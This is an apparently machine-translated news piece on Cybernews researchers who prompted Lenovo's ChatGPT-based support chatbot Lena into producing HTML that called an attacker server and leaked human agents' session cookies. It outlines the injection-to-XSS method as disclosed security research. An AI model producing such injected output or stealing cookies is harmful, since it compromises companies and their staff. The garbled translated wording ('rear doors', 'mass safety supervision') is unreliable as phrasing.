- The researchers found a way of deceiving the AI of Lenovo Chatbot Lena
- Lena shared active session cookies with researchers
- Malicious indications could be used for a wide variety of attacks.
Lena, the chatbot that works with Chatgpt that appears on the Lenovo website, could become malicious privileged information, spilling company secrets or executing malware, using nothing more than a notice, experts have warned.
Security researchers in Cybernews He managed to obtain active session cookies of human customer service agents, essentially assuming their accounts, accessing confidential data and potentially turning other parts of the corporate network.
“The discovery highlights multiple security problems: inadequate user input disinfecting, disinfecting inadequate chatbot output, the web server that does not verify the content produced by the chatbot, execute not verified code and load arbitrary web resources content. This leaves many options for command sequences attacks between sites (XSS),” the investigators said in their report.
“Mass safety supervision”
In the center of the problem, they said, it is the fact that chatbots are “people’s complacent.” Without appropriate railings baked, they will do what they are told, and they cannot distinguish a benign request from a malicious.
In this case, Cybernews The researchers wrote a 400 word message in which the Chatbot was asked to generate an HTML response.
The response contained secret instructions to access resources from a server under the control of the attackers, with instructions to send the data obtained from the client browser.
They also emphasized that, although their evidence resulted in the theft of session cookies, the final result could be almost anything.
“This is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow the installation of rear doors and lateral movement to other servers and computers in the network.” Cybernews explained.
“We don’t try any of this,” they added.
After notifying Lenovo of his findings, Cybernews They told the technological giant “protected their systems”, without detailing exactly what was done: a “mass security supervision” with potentially devastating consequences.
The researchers urged all companies that use chatbots to assume that all the results are “potentially malicious” and act accordingly.